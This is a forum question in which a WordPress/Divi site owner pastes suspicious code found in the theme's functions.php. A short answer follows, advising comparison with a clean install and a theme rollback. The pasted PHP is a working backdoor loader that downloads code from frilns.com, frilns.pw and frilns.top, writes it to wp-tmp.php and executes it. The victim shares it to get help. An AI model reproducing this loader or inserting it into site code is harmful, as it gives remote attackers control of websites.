Wordpress unknown code function.php - http://www.frilns.com/code.php

Question

I am working on a new website with Wordpress and Divi theme.

Today I found in function.php an unknown code. When I try to go to the URL nothing happens.

In the website: https://themecheck.info/ they said it is a malware. But I cannot confirm it (https://themecheck.info/fr/score/theme-wordpress-solar-shared-by-vestathemes-com.html)

In another one they said Frilins is a Chrome Malware. Nothing with wordpress.

I am afraid if it is hacked.

$wp_auth_key='3770030e7d87cbaf0baf1';
    if (($tmpcontent = @file_get_contents("http://www.frilns.com/code.php") OR $tmpcontent = 
@file_get_contents_tcurl("http://www.frilns.com/code.php")) AND stripos($tmpcontent, 
$wp_auth_key) !== false) {

        if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    }


    elseif ($tmpcontent = @file_get_contents("http://www.frilns.pw/code.php")  AND 
stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    } 

            elseif ($tmpcontent = @file_get_contents("http://www.frilns.top/code.php")  AND 
stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND 
stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND 
stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, 
$wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    }    
}
}

I tried to such but no real information.

Thank you for your help

J

Answer 1

You can compare the default functions.php file from a fresh Divi install (taken from the Members area, that is 100% secure) with your actual functions.php and see that the code you are currently having is not there by default, it shouldn't.

You can go to Theme Options -> Updates and rollback to the previous version, then upgrade again, that will grab the fresh theme files which are clean.